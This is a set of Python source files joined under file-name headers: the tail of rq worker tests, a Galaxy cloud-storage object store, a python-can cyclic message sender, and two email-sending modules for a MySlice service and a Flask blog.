self.assertTrue(os.path.exists(os.path.join(self.sandbox, 'started'))) self.assertFalse(os.path.exists(os.path.join(self.sandbox, 'finished'))) @slow def test_1_sec_shutdown(self): """Heroku work horse shutdown with 1 second kill""" p = Process(target=run_dummy_heroku_worker, args=(self.sandbox, 1)) p.start() time.sleep(0.5) os.kill(p.pid, signal.SIGRTMIN) time.sleep(0.1) self.assertEqual(p.exitcode, None) p.join(2) self.assertEqual(p.exitcode, 1) self.assertTrue(os.path.exists(os.path.join(self.sandbox, 'started'))) self.assertFalse(os.path.exists(os.path.join(self.sandbox, 'finished'))) @slow def test_shutdown_double_sigrtmin(self): """Heroku work horse shutdown with long delay but SIGRTMIN sent twice""" p = Process(target=run_dummy_heroku_worker, args=(self.sandbox, 10)) p.start() time.sleep(0.5) os.kill(p.pid, signal.SIGRTMIN) # we have to wait a short while otherwise the second signal wont bet processed. time.sleep(0.1) os.kill(p.pid, signal.SIGRTMIN) p.join(2) self.assertEqual(p.exitcode, 1) self.assertTrue(os.path.exists(os.path.join(self.sandbox, 'started'))) self.assertFalse(os.path.exists(os.path.join(self.sandbox, 'finished'))) @mock.patch('rq.worker.logger.info') def test_handle_shutdown_request(self, mock_logger_info): """Mutate HerokuWorker so _horse_pid refers to an artificial process and test handle_warm_shutdown_request""" w = HerokuWorker('foo') path = os.path.join(self.sandbox, 'shouldnt_exist') p = Process(target=create_file_after_timeout_and_setsid, args=(path, 2)) p.start() self.assertEqual(p.exitcode, None) time.sleep(0.1) w._horse_pid = p.pid w.handle_warm_shutdown_request() p.join(2) # would expect p.exitcode to be -34 self.assertEqual(p.exitcode, -34) self.assertFalse(os.path.exists(path)) mock_logger_info.assert_called_with('Killed horse pid %s', p.pid) def test_handle_shutdown_request_no_horse(self): """Mutate HerokuWorker so _horse_pid refers to non existent process and test handle_warm_shutdown_request""" w = HerokuWorker('foo') w._horse_pid = 19999 w.handle_warm_shutdown_request() class TestExceptionHandlerMessageEncoding(RQTestCase): def setUp(self): super(TestExceptionHandlerMessageEncoding, self).setUp() self.worker = Worker("foo") self.worker._exc_handlers = [] # Mimic how exception info is actually passed forwards try: raise Exception(u"💪") except Exception: self.exc_info = sys.exc_info() def test_handle_exception_handles_non_ascii_in_exception_message(self): """worker.handle_exception doesn't crash on non-ascii in exception message.""" self.worker.handle_exception(Mock(), *self.exc_info) class TestRoundRobinWorker(RQTestCase): def test_round_robin(self): qs = [Queue('q%d' % i) for i in range(5)] for i in range(5): for j in range(3): qs[i].enqueue(say_pid, job_id='q%d_%d' % (i, j)) w = RoundRobinWorker(qs) w.work(burst=True) start_times = [] for i in range(5): for j in range(3): job = Job.fetch('q%d_%d' % (i, j)) start_times.append(('q%d_%d' % (i, j), job.started_at)) sorted_by_time = sorted(start_times, key=lambda tup: tup[1]) sorted_ids = [tup[0] for tup in sorted_by_time] expected = ['q0_0', 'q1_0', 'q2_0', 'q3_0', 'q4_0', 'q0_1', 'q1_1', 'q2_1', 'q3_1', 'q4_1', 'q0_2', 'q1_2', 'q2_2', 'q3_2', 'q4_2'] self.assertEqual(expected, sorted_ids) class TestRandomWorker(RQTestCase): def test_random_worker(self): qs = [Queue('q%d' % i) for i in range(5)] for i in range(5): for j in range(3): qs[i].enqueue(say_pid, job_id='q%d_%d' % (i, j)) w = RandomWorker(qs) w.work(burst=True) start_times = [] for i in range(5): for j in range(3): job = Job.fetch('q%d_%d' % (i, j)) start_times.append(('q%d_%d' % (i, j), job.started_at)) sorted_by_time = sorted(start_times, key=lambda tup: tup[1]) sorted_ids = [tup[0] for tup in sorted_by_time] expected_rr = ['q%d_%d' % (i, j) for j in range(3) for i in range(5)] expected_ser = ['q%d_%d' % (i, j) for i in range(5) for j in range(3)] self.assertNotEqual(sorted_ids, expected_rr) self.assertNotEqual(sorted_ids, expected_ser) expected_rr.reverse() expected_ser.reverse() self.assertNotEqual(sorted_ids, expected_rr) self.assertNotEqual(sorted_ids, expected_ser) sorted_ids.sort() expected_ser.sort() self.assertEqual(sorted_ids, expected_ser)
cloud.py
""" Object Store plugin for Cloud storage. """ import logging import multiprocessing import os import os.path import shutil import subprocess import threading import time from datetime import datetime from galaxy.exceptions import ObjectInvalid, ObjectNotFound from galaxy.util import ( directory_hash_id, safe_relpath, umask_fix_perms, ) from galaxy.util.sleeper import Sleeper from .s3 import parse_config_xml from ..objectstore import ConcreteObjectStore, convert_bytes try: from cloudbridge.factory import CloudProviderFactory, ProviderList from cloudbridge.interfaces.exceptions import InvalidNameException except ImportError: CloudProviderFactory = None ProviderList = None log = logging.getLogger(__name__) NO_CLOUDBRIDGE_ERROR_MESSAGE = ( "Cloud ObjectStore is configured, but no CloudBridge dependency available." "Please install CloudBridge or modify ObjectStore configuration." ) class CloudConfigMixin: def _config_to_dict(self): return { "provider": self.provider, "auth": self.credentials, "bucket": { "name": self.bucket_name, "use_reduced_redundancy": self.use_rr, }, "connection": { "host": self.host, "port": self.port, "multipart": self.multipart, "is_secure": self.is_secure, "conn_path": self.conn_path, }, "cache": { "size": self.cache_size, "path": self.staging_path, } } class Cloud(ConcreteObjectStore, CloudConfigMixin): """ Object store that stores objects as items in an cloud storage. A local cache exists that is used as an intermediate location for files between Galaxy and the cloud storage. """ store_type = 'cloud' def __init__(self, config, config_dict): super().__init__(config, config_dict) self.transfer_progress = 0 bucket_dict = config_dict['bucket'] connection_dict = config_dict.get('connection', {}) cache_dict = config_dict['cache'] self.provider = config_dict["provider"] self.credentials = config_dict["auth"] self.bucket_name = bucket_dict.get('name') self.use_rr = bucket_dict.get('use_reduced_redundancy', False) self.max_chunk_size = bucket_dict.get('max_chunk_size', 250) self.host = connection_dict.get('host', None) self.port = connection_dict.get('port', 6000) self.multipart = connection_dict.get('multipart', True) self.is_secure = connection_dict.get('is_secure', True) self.conn_path = connection_dict.get('conn_path', '/') self.cache_size = cache_dict.get('size', -1) self.staging_path = cache_dict.get('path') or self.config.object_store_cache_path self._initialize() def _initialize(self): if CloudProviderFactory is None: raise Exception(NO_CLOUDBRIDGE_ERROR_MESSAGE) self.conn = self._get_connection(self.provider, self.credentials) self.bucket = self._get_bucket(self.bucket_name) # Clean cache only if value is set in galaxy.ini if self.cache_size != -1: # Convert GBs to bytes for comparison self.cache_size = self.cache_size * 1073741824 # Helper for interruptable sleep self.sleeper = Sleeper() self.cache_monitor_thread = threading.Thread(target=self.__cache_monitor) self.cache_monitor_thread.start() log.info("Cache cleaner manager started") # Test if 'axel' is available for parallel download and pull the key into cache try: subprocess.call('axel') self.use_axel = True except OSError: self.use_axel = False @staticmethod def _get_connection(provider, credentials): log.debug("Configuring `{}` Connection".format(provider)) if provider == "aws": config = {"aws_access_key": credentials["access_key"], "aws_secret_key": credentials["secret_key"]} connection = CloudProviderFactory().create_provider(ProviderList.AWS, config) elif provider == "azure": config = {"azure_subscription_id": credentials["subscription_id"], "azure_client_id": credentials["client_id"], "azure_secret": credentials["secret"], "azure_tenant": credentials["tenant"]} connection = CloudProviderFactory().create_provider(ProviderList.AZURE, config) elif provider == "google": config = {"gcp_service_creds_file": credentials["credentials_file"]} connection = CloudProviderFactory().create_provider(ProviderList.GCP, config) else: raise Exception("Unsupported provider `{}`.".format(provider)) # Ideally it would be better to assert if the connection is # authorized to perform operations required by ObjectStore # before returning it (and initializing ObjectStore); hence # any related issues can be handled properly here, and ObjectStore # can "trust" the connection is established. # # However, the mechanism implemented in Cloudbridge to assert if # a user/service is authorized to perform an operation, assumes # the user/service is granted with an elevated privileges, such # as admin/owner-level access to all resources. For a detailed # discussion see: # # https://github.com/CloudVE/cloudbridge/issues/135 # # Hence, if a resource owner wants to only authorize Galaxy to r/w # a bucket/container on the provider, but does not allow it to access # other resources, Cloudbridge may fail asserting credentials. # For instance, to r/w an Amazon S3 bucket, the resource owner # also needs to authorize full access to Amazon EC2, because Cloudbridge # leverages EC2-specific functions to assert the credentials. # # Therefore, to adhere with principle of least privilege, we do not # assert credentials; instead, we handle exceptions raised as a # result of signing API calls to cloud provider (e.g., GCP) using # incorrect, invalid, or unauthorized credentials. return connection @classmethod def parse_xml(clazz, config_xml): # The following reads common cloud-based storage configuration # as implemented for the S3 backend. Hence, it also attempts to # parse S3-specific configuration (e.g., credentials); however, # such provider-specific configuration is overwritten in the # following. config = parse_config_xml(config_xml) try: provider = config_xml.attrib.get("provider") if provider is None: msg = "Missing `provider` attribute from the Cloud backend of the ObjectStore." log.error(msg) raise Exception(msg) provider = provider.lower() config["provider"] = provider # Read any provider-specific configuration. auth_element = config_xml.findall("auth")[0] missing_config = [] if provider == "aws": akey = auth_element.get("access_key") if akey is None: missing_config.append("access_key") skey = auth_element.get("secret_key") if skey is None: missing_config.append("secret_key") config["auth"] = { "access_key": akey, "secret_key": skey} elif provider == "azure": sid = auth_element.get("subscription_id") if sid is None: missing_config.append("subscription_id") cid = auth_element.get("client_id") if cid is None: missing_config.append("client_id") sec = auth_element.get("secret") if sec is None: missing_config.append("secret") ten = auth_element.get("tenant") if ten is None: missing_config.append("tenant") config["auth"] = { "subscription_id": sid, "client_id": cid, "secret": sec, "tenant": ten} elif provider == "google": cre = auth_element.get("credentials_file") if not os.path.isfile(cre): msg = "The following file specified for GCP credentials not found: {}".format(cre) log.error(msg) raise OSError(msg) if cre is None: missing_config.append("credentials_file") config["auth"] = { "credentials_file": cre} else: msg = "Unsupported provider `{}`.".format(provider) log.error(msg) raise Exception(msg) if len(missing_config) > 0: msg = "The following configuration required for {} cloud backend " \ "are missing: {}".format(provider, missing_config) log.error(msg) raise Exception(msg) else: return config except Exception: log.exception("Malformed ObjectStore Configuration XML -- unable to continue") raise def to_dict(self): as_dict = super().to_dict() as_dict.update(self._config_to_dict()) return as_dict def __cache_monitor(self): time.sleep(2) # Wait for things to load before starting the monitor while self.running: total_size = 0 # Is this going to be too expensive of an operation to be done frequently? file_list = [] for dirpath, _, filenames in os.walk(self.staging_path): for filename in filenames: filepath = os.path.join(dirpath, filename) file_size = os.path.getsize(filepath) total_size += file_size # Get the time given file was last accessed last_access_time = time.localtime(os.stat(filepath)[7]) # Compose a tuple of the access time and the file path file_tuple = last_access_time, filepath, file_size file_list.append(file_tuple) # Sort the file list (based on access time) file_list.sort() # Initiate cleaning once within 10% of the defined cache size? cache_limit = self.cache_size * 0.9 if total_size > cache_limit: log.info("Initiating cache cleaning: current cache size: %s; clean until smaller than: %s", convert_bytes(total_size), convert_bytes(cache_limit)) # How much to delete? If simply deleting up to the cache-10% limit, # is likely to be deleting frequently and may run the risk of hitting # the limit - maybe delete additional #%? # For now, delete enough to leave at least 10% of the total cache free delete_this_much = total_size - cache_limit self.__clean_cache(file_list, delete_this_much) self.sleeper.sleep(30) # Test cache size every 30 seconds? def __clean_cache(self, file_list, delete_this_much): """ Keep deleting files from the file_list until the size of the deleted files is greater than the value in delete_this_much parameter. :type file_list: list :param file_list: List of candidate files that can be deleted. This method will start deleting files from the beginning of the list so the list should be sorted accordingly. The list must contains 3-element tuples, positioned as follows: position 0 holds file last accessed timestamp (as time.struct_time), position 1 holds file path, and position 2 has file size (e.g., (<access time>, /mnt/data/dataset_1.dat), 472394) :type delete_this_much: int :param delete_this_much: Total size of files, in bytes, that should be deleted. """ # Keep deleting datasets from file_list until deleted_amount does not # exceed delete_this_much; start deleting from the front of the file list, # which assumes the oldest files come first on the list. deleted_amount = 0 for entry in enumerate(file_list): if deleted_amount < delete_this_much: deleted_amount += entry[2] os.remove(entry[1]) # Debugging code for printing deleted files' stats # folder, file_name = os.path.split(f[1]) # file_date = time.strftime("%m/%d/%y %H:%M:%S", f[0]) # log.debug("%s. %-25s %s, size %s (deleted %s/%s)" \ # % (i, file_name, convert_bytes(f[2]), file_date, \ # convert_bytes(deleted_amount), convert_bytes(delete_this_much))) else: log.debug("Cache cleaning done. Total space freed: %s", convert_bytes(deleted_amount)) return def _get_bucket(self, bucket_name): try: bucket = self.conn.storage.buckets.get(bucket_name) if bucket is None: log.debug("Bucket not found, creating a bucket with handle '%s'", bucket_name) bucket = self.conn.storage.buckets.create(bucket_name) log.debug("Using cloud ObjectStore with bucket '%s'", bucket.name) return bucket except InvalidNameException: log.exception("Invalid bucket name -- unable to continue") raise except Exception: # These two generic exceptions will be replaced by specific exceptions # once proper exceptions are exposed by CloudBridge. log.exception("Could not get bucket '{}'".format(bucket_name)) raise Exception def _fix_permissions(self, rel_path): """ Set permissions on rel_path""" for basedir, _, files in os.walk(rel_path): umask_fix_perms(basedir, self.config.umask, 0o777, self.config.gid) for filename in files: path = os.path.join(basedir, filename) # Ignore symlinks if os.path.islink(path): continue umask_fix_perms(path, self.config.umask, 0o666, self.config.gid) def _construct_path(self, obj, base_dir=None, dir_only=None, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False, **kwargs): # extra_dir should never be constructed from provided data but just # make sure there are no shenannigans afoot if extra_dir and extra_dir != os.path.normpath(extra_dir): log.warning('extra_dir is not normalized: %s', extra_dir) raise ObjectInvalid("The requested object is invalid") # ensure that any parent directory references in alt_name would not # result in a path not contained in the directory path constructed here if alt_name: if not safe_relpath(alt_name): log.warning('alt_name would locate path outside dir: %s', alt_name) raise ObjectInvalid("The requested object is invalid") # alt_name can contain parent directory references, but S3 will not # follow them, so if they are valid we normalize them out alt_name = os.path.normpath(alt_name) rel_path = os.path.join(*directory_hash_id(self._get_object_id(obj))) if extra_dir is not None: if extra_dir_at_root: rel_path = os.path.join(extra_dir, rel_path) else: rel_path = os.path.join(rel_path, extra_dir) # for JOB_WORK directory if obj_dir: rel_path = os.path.join(rel_path, str(self._get_object_id(obj))) if base_dir: base = self.extra_dirs.get(base_dir) return os.path.join(base, rel_path) # S3 folders are marked by having trailing '/' so add it now rel_path = '%s/' % rel_path if not dir_only: rel_path = os.path.join(rel_path, alt_name if alt_name else "dataset_%s.dat" % self._get_object_id(obj)) return rel_path def _get_cache_path(self, rel_path): return os.path.abspath(os.path.join(self.staging_path, rel_path)) def _get_transfer_progress(self): return self.transfer_progress def _get_size_in_cloud(self, rel_path): try: obj = self.bucket.objects.get(rel_path) if obj: return obj.size except Exception: log.exception("Could not get size of key '%s' from S3", rel_path) return -1 def _key_exists(self, rel_path): exists = False try: # A hackish way of testing if the rel_path is a folder vs a file is_dir = rel_path[-1] == '/' if is_dir: keyresult = self.bucket.objects.list(prefix=rel_path) if len(keyresult) > 0: exists = True else: exists = False else: exists = True if self.bucket.objects.get(rel_path) is not None else False except Exception: log.exception("Trouble checking existence of S3 key '%s'", rel_path) return False if rel_path[0] == '/': raise return exists def _in_cache(self, rel_path): """ Check if the given dataset is in the local cache and return True if so. """ # log.debug("------ Checking cache for rel_path %s" % rel_path) cache_path = self._get_cache_path(rel_path) return os.path.exists(cache_path) def _pull_into_cache(self, rel_path): # Ensure the cache directory structure exists (e.g., dataset_#_files/) rel_path_dir = os.path.dirname(rel_path) if not os.path.exists(self._get_cache_path(rel_path_dir)): os.makedirs(self._get_cache_path(rel_path_dir)) # Now pull in the file file_ok = self._download(rel_path) self._fix_permissions(self._get_cache_path(rel_path_dir)) return file_ok def _transfer_cb(self, complete, total): self.transfer_progress += 10 def _download(self, rel_path): try: log.debug("Pulling key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path)) key = self.bucket.objects.get(rel_path) # Test if cache is large enough to hold the new file if self.cache_size > 0 and key.size > self.cache_size: log.critical("File %s is larger (%s) than the cache size (%s). Cannot download.", rel_path, key.size, self.cache_size) return False if self.use_axel: log.debug("Parallel pulled key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path)) ncores = multiprocessing.cpu_count() url = key.generate_url(7200) ret_code = subprocess.call("axel -a -n {} '{}'".format(ncores, url)) if ret_code == 0: return True else: log.debug("Pulled key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path)) self.transfer_progress = 0 # Reset transfer progress counter with open(self._get_cache_path(rel_path), "w+") as downloaded_file_handle: key.save_content(downloaded_file_handle) return True except Exception: log.exception("Problem downloading key '%s' from S3 bucket '%s'", rel_path, self.bucket.name) return False def _push_to_os(self, rel_path, source_file=None, from_string=None): """ Push the file pointed to by ``rel_path`` to the object store naming the key ``rel_path``. If ``source_file`` is provided, push that file instead while still using ``rel_path`` as the key name. If ``from_string`` is provided, set contents of the file to the value of the string. """ try: source_file = source_file if source_file else self._get_cache_path(rel_path) if os.path.exists(source_file): if os.path.getsize(source_file) == 0 and (self.bucket.objects.get(rel_path) is not None): log.debug("Wanted to push file '%s' to S3 key '%s' but its size is 0; skipping.", source_file, rel_path) return True if from_string: if not self.bucket.objects.get(rel_path): created_obj = self.bucket.objects.create(rel_path) created_obj.upload(source_file) else: self.bucket.objects.get(rel_path).upload(source_file) log.debug("Pushed data from string '%s' to key '%s'", from_string, rel_path) else: start_time = datetime.now() log.debug("Pushing cache file '%s' of size %s bytes to key '%s'", source_file, os.path.getsize(source_file), rel_path) self.transfer_progress = 0 # Reset transfer progress counter if not self.bucket.objects.get(rel_path): created_obj = self.bucket.objects.create(rel_path) created_obj.upload_from_file(source_file) else: self.bucket.objects.get(rel_path).upload_from_file(source_file) end_time = datetime.now() log.debug("Pushed cache file '%s' to key '%s' (%s bytes transfered in %s sec)", source_file, rel_path, os.path.getsize(source_file), end_time - start_time) return True else: log.error("Tried updating key '%s' from source file '%s', but source file does not exist.", rel_path, source_file) except Exception: log.exception("Trouble pushing S3 key '%s' from file '%s'", rel_path, source_file) return False def file_ready(self, obj, **kwargs): """ A helper method that checks if a file corresponding to a dataset is ready and available to be used. Return ``True`` if so, ``False`` otherwise. """ rel_path = self._construct_path(obj, **kwargs) # Make sure the size in cache is available in its entirety if self._in_cache(rel_path): if os.path.getsize(self._get_cache_path(rel_path)) == self._get_size_in_cloud(rel_path): return True log.debug("Waiting for dataset %s to transfer from OS: %s/%s", rel_path, os.path.getsize(self._get_cache_path(rel_path)), self._get_size_in_cloud(rel_path)) return False def _exists(self, obj, **kwargs): in_cache = False rel_path = self._construct_path(obj, **kwargs) # Check cache if self._in_cache(rel_path): in_cache = True # Check cloud in_cloud = self._key_exists(rel_path) # log.debug("~~~~~~ File '%s' exists in cache: %s; in s3: %s" % (rel_path, in_cache, in_s3)) # dir_only does not get synced so shortcut the decision dir_only = kwargs.get('dir_only', False) base_dir = kwargs.get('base_dir', None) if dir_only: if in_cache or in_cloud: return True # for JOB_WORK directory elif base_dir: if not os.path.exists(rel_path): os.makedirs(rel_path) return True else: return False # TODO: Sync should probably not be done here. Add this to an async upload stack? if in_cache and not in_cloud: self._push_to_os(rel_path, source_file=self._get_cache_path(rel_path)) return True elif in_cloud: return True else: return False def _create(self, obj, **kwargs): if not self._exists(obj, **kwargs): # Pull out locally used fields extra_dir = kwargs.get('extra_dir', None) extra_dir_at_root = kwargs.get('extra_dir_at_root', False) dir_only = kwargs.get('dir_only', False) alt_name = kwargs.get('alt_name', None) # Construct hashed path rel_path = os.path.join(*directory_hash_id(self._get_object_id(obj))) # Optionally append extra_dir if extra_dir is not None: if extra_dir_at_root: rel_path = os.path.join(extra_dir, rel_path) else: rel_path = os.path.join(rel_path, extra_dir) # Create given directory in cache cache_dir = os.path.join(self.staging_path, rel_path) if not os.path.exists(cache_dir): os.makedirs(cache_dir) if not dir_only: rel_path = os.path.join(rel_path, alt_name if alt_name else "dataset_%s.dat" % self._get_object_id(obj)) open(os.path.join(self.staging_path, rel_path), 'w').close() self._push_to_os(rel_path, from_string='') def _empty(self, obj, **kwargs): if self._exists(obj, **kwargs): return bool(self._size(obj, **kwargs) > 0) else: raise ObjectNotFound('objectstore.empty, object does not exist: %s, kwargs: %s' % (str(obj), str(kwargs))) def _size(self, obj, **kwargs): rel_path = self._construct_path(obj, **kwargs) if self._in_cache(rel_path): try: return os.path.getsize(self._get_cache_path(rel_path)) except OSError as ex: log.info("Could not get size of file '%s' in local cache, will try cloud. Error: %s", rel_path, ex) elif self._exists(obj, **kwargs): return self._get_size_in_cloud(rel_path) log.warning("Did not find dataset '%s', returning 0 for size", rel_path) return 0 def _delete(self, obj, entire_dir=False, **kwargs): rel_path = self._construct_path(obj, **kwargs) extra_dir = kwargs.get('extra_dir', None) base_dir = kwargs.get('base_dir', None) dir_only = kwargs.get('dir_only', False) obj_dir = kwargs.get('obj_dir', False) try: # Remove temparory data in JOB_WORK directory if base_dir and dir_only and obj_dir: shutil.rmtree(os.path.abspath(rel_path)) return True # For the case of extra_files, because we don't have a reference to # individual files/keys we need to remove the entire directory structure # with all the files in it. This is easy for the local file system, # but requires iterating through each individual key in S3 and deleing it. if entire_dir and extra_dir: shutil.rmtree(self._get_cache_path(rel_path)) results = self.bucket.objects.list(prefix=rel_path) for key in results: log.debug("Deleting key %s", key.name) key.delete() return True else: # Delete from cache first os.unlink(self._get_cache_path(rel_path)) # Delete from S3 as well if self._key_exists(rel_path): key = self.bucket.objects.get(rel_path) log.debug("Deleting key %s", key.name) key.delete() return True except Exception: log.exception("Could not delete key '%s' from cloud", rel_path) except OSError: log.exception('%s delete error', self._get_filename(obj, **kwargs)) return False def _get_data(self, obj, start=0, count=-1, **kwargs): rel_path = self._construct_path(obj, **kwargs) # Check cache first and get file if not there if not self._in_cache(rel_path): self._pull_into_cache(rel_path) # Read the file content from cache data_file = open(self._get_cache_path(rel_path)) data_file.seek(start) content = data_file.read(count) data_file.close() return content def _get_filename(self, obj, **kwargs): base_dir = kwargs.get('base_dir', None) dir_only = kwargs.get('dir_only', False) obj_dir = kwargs.get('obj_dir', False) rel_path = self._construct_path(obj, **kwargs) # for JOB_WORK directory if base_dir and dir_only and obj_dir: return os.path.abspath(rel_path) cache_path = self._get_cache_path(rel_path) # S3 does not recognize directories as files so cannot check if those exist. # So, if checking dir only, ensure given dir exists in cache and return # the expected cache path. # dir_only = kwargs.get('dir_only', False) # if dir_only: # if not os.path.exists(cache_path): # os.makedirs(cache_path) # return cache_path # Check if the file exists in the cache first if self._in_cache(rel_path): return cache_path # Check if the file exists in persistent storage and, if it does, pull it into cache elif self._exists(obj, **kwargs): if dir_only: # Directories do not get pulled into cache return cache_path else: if self._pull_into_cache(rel_path): return cache_path # For the case of retrieving a directory only, return the expected path # even if it does not exist. # if dir_only: # return cache_path raise ObjectNotFound('objectstore.get_filename, no cache_path: %s, kwargs: %s' % (str(obj), str(kwargs))) # return cache_path # Until the upload tool does not explicitly create the dataset, return expected path def _update_from_file(self, obj, file_name=None, create=False, **kwargs): if create: self._create(obj, **kwargs) if self._exists(obj, **kwargs): rel_path = self._construct_path(obj, **kwargs) # Chose whether to use the dataset file itself or an alternate file if file_name: source_file = os.path.abspath(file_name) # Copy into cache cache_file = self._get_cache_path(rel_path) try: if source_file != cache_file: # FIXME? Should this be a `move`? shutil.copy2(source_file, cache_file) self._fix_permissions(cache_file) except OSError: log.exception("Trouble copying source file '%s' to cache '%s'", source_file, cache_file) else: source_file = self._get_cache_path(rel_path) # Update the file on cloud self._push_to_os(rel_path, source_file) else: raise ObjectNotFound('objectstore.update_from_file, object does not exist: %s, kwargs: %s' % (str(obj), str(kwargs))) def _get_object_url(self, obj, **kwargs): if self._exists(obj, **kwargs): rel_path = self._construct_path(obj, **kwargs) try: key = self.bucket.objects.get(rel_path) return key.generate_url(expires_in=86400) # 24hrs except Exception: log.exception("Trouble generating URL for dataset '%s'", rel_path) return None def _get_store_usage_percent(self): return 0.0
broadcastmanager.py
# coding: utf-8 """ Exposes several methods for transmitting cyclic messages. The main entry point to these classes should be through :meth:`can.BusABC.send_periodic`. """ import abc import logging import threading import time import warnings log = logging.getLogger('can.bcm') class CyclicTask(object): """ Abstract Base for all cyclic tasks. """ @abc.abstractmethod def stop(self): """Cancel this periodic task. :raises can.CanError: If stop is called on an already stopped task. """ class CyclicSendTaskABC(CyclicTask): """ Message send task with defined period """ def __init__(self, message, period): """ :param can.Message message: The message to be sent periodically. :param float period: The rate in seconds at which to send the message. """ self.message = message self.can_id = message.arbitration_id self.arbitration_id = message.arbitration_id self.period = period super(CyclicSendTaskABC, self).__init__() class LimitedDurationCyclicSendTaskABC(CyclicSendTaskABC): def __init__(self, message, period, duration): """Message send task with a defined duration and period. :param can.Message message: The message to be sent periodically. :param float period: The rate in seconds at which to send the message. :param float duration: The duration to keep sending this message at given rate. """ super(LimitedDurationCyclicSendTaskABC, self).__init__(message, period) self.duration = duration class RestartableCyclicTaskABC(CyclicSendTaskABC): """Adds support for restarting a stopped cyclic task""" @abc.abstractmethod def start(self): """Restart a stopped periodic task. """ class ModifiableCyclicTaskABC(CyclicSendTaskABC): """Adds support for modifying a periodic message""" def modify_data(self, message): """Update the contents of this periodically sent message without altering the timing. :param can.Message message: The message with the new :attr:`can.Message.data`. Note: The arbitration ID cannot be changed. """ self.message = message class MultiRateCyclicSendTaskABC(CyclicSendTaskABC): """A Cyclic send task that supports switches send frequency after a set time. """ def __init__(self, channel, message, count, initial_period, subsequent_period): """ Transmits a message `count` times at `initial_period` then continues to transmit message at `subsequent_period`. :param channel: See interface specific documentation. :param can.Message message: :param int count: :param float initial_period: :param float subsequent_period: """ super(MultiRateCyclicSendTaskABC, self).__init__(channel, message, subsequent_period) class ThreadBasedCyclicSendTask(ModifiableCyclicTaskABC, LimitedDurationCyclicSendTaskABC, RestartableCyclicTaskABC): """Fallback cyclic send task using thread.""" def __init__(self, bus, lock, message, period, duration=None): super(ThreadBasedCyclicSendTask, self).__init__(message, period, duration) self.bus = bus self.lock = lock self.stopped = True self.thread = None self.end_time = time.time() + duration if duration else None self.start() def stop(self): self.stopped = True def start(self): self.stopped = False if self.thread is None or not self.thread.is_alive(): name = "Cyclic send task for 0x%X" % (self.message.arbitration_id) self.thread = threading.Thread(target=self._run, name=name) self.thread.daemon = True self.thread.start() def _run(self): while not self.stopped: # Prevent calling bus.send from multiple threads with self.lock: started = time.time() try: self.bus.send(self.message) except Exception as exc: log.exception(exc) break if self.end_time is not None and time.time() >= self.end_time: break # Compensate for the time it takes to send the message delay = self.period - (time.time() - started) time.sleep(max(0.0, delay)) def send_periodic(bus, message, period, *args, **kwargs): """ Send a :class:`~can.Message` every `period` seconds on the given bus. :param can.BusABC bus: A CAN bus which supports sending. :param can.Message message: Message to send periodically. :param float period: The minimum time between sending messages. :return: A started task instance """ warnings.warn("The function `can.send_periodic` is deprecated and will " + "be removed in an upcoming version. Please use `can.Bus.send_periodic` instead.", DeprecationWarning) return bus.send_periodic(message, period, *args, **kwargs)
emails.py
# # MySlice version 2 # # Activity process service: manages emails # # (c) 2016 Ciro Scognamiglio <ciro.scognamiglio@lip6.fr> ## import signal import threading from queue import Queue import rethinkdb as r from myslice.db import connect, changes, events from myslice.db.activity import Event from myslice.services.workers.emails import emails_run as manageEmails, confirmEmails import myslice.lib.log as logging import zmq import pickle logger = logging.getLogger("emails") def receive_signal(signum, stack): logger.info('Received signal %s', signum) raise SystemExit('Exiting') def run(): """ """ signal.signal(signal.SIGINT, receive_signal) signal.signal(signal.SIGTERM, receive_signal) signal.signal(signal.SIGHUP, receive_signal) threads = [] qEmails = Queue() for y in range(1): t = threading.Thread(target=manageEmails, args=(qEmails,)) t.daemon = True threads.append(t) t.start() qConfirmEmails = Queue() for y in range(1): t = threading.Thread(target=confirmEmails, args=(qConfirmEmails,)) t.daemon = True threads.append(t) t.start() context = zmq.Context() socket = context.socket(zmq.SUB) socket.setsockopt_string(zmq.SUBSCRIBE, 'emails') socket.connect("tcp://localhost:6002") logger.info("[emails] Collecting updates from ZMQ bus for activity") while True: logger.debug("[emails]Change in emails feed") topic, zmqmessage = socket.recv_multipart() activity = pickle.loads(zmqmessage) logger.debug("[emails]{0}: {1}".format(topic, activity)) try: event = Event(activity['new_val']) except Exception as e: logger.error("Problem with event: {}".format(e)) continue else: if event.isConfirm() and event.notify: logger.debug("Add event %s to Confirm Email queue" % (event.id)) qConfirmEmails.put(event) elif event.isPending() and event.notify: logger.debug("Add event %s to Email queue" % (event.id)) qEmails.put(event) elif event.isDenied() and event.notify: logger.info("event {} is denied".format(event.id)) logger.debug("Add event %s to Email queue" % (event.id)) qEmails.put(event) elif event.isSuccess() and event.notify: logger.debug("Add event %s to Email queue" % (event.id)) qEmails.put(event) logger.critical("Service emails stopped") # waits for the thread to finish for x in threads: x.join()
emails.py
# -*- coding: utf-8 -*- """ """ from threading import Thread from flask import url_for, current_app from flask_mail import Message from myblog.extensions import mail def _send_async_mail(app, message): with app.app_context(): mail.send(message) def send_mail(subject, to, html): app = current_app._get_current_object() message = Message(subject, recipients=[to], html=html) thr = Thread(target=_send_async_mail, args=[app, message]) thr.start() return thr def send_new_comment_email(post): post_url = url_for('blog.show_post', post_id=post.id, _external=True) + '#comments' send_mail(subject='New comment', to=current_app.config['MYBLOG_EMAIL'], html='<p>New comment in post <i>%s</i>, click the link below to check:</p>' '<p><a href="%s">%s</a></P>' '<p><small style="color: #868e96">Do not reply this email.</small></p>' % (post.title, post_url, post_url)) def send_new_reply_email(comment): post_url = url_for('blog.show_post', post_id=comment.post_id, _external=True) + '#comments' send_mail(subject='New reply', to=comment.email, html='<p>New reply for the comment you left in post <i>%s</i>, click the link below to check: </p>' '<p><a href="%s">%s</a></p>' '<p><small style="color: #868e96">Do not reply this email.</small></p>' % (comment.post.title, post_url, post_url))
connector.py
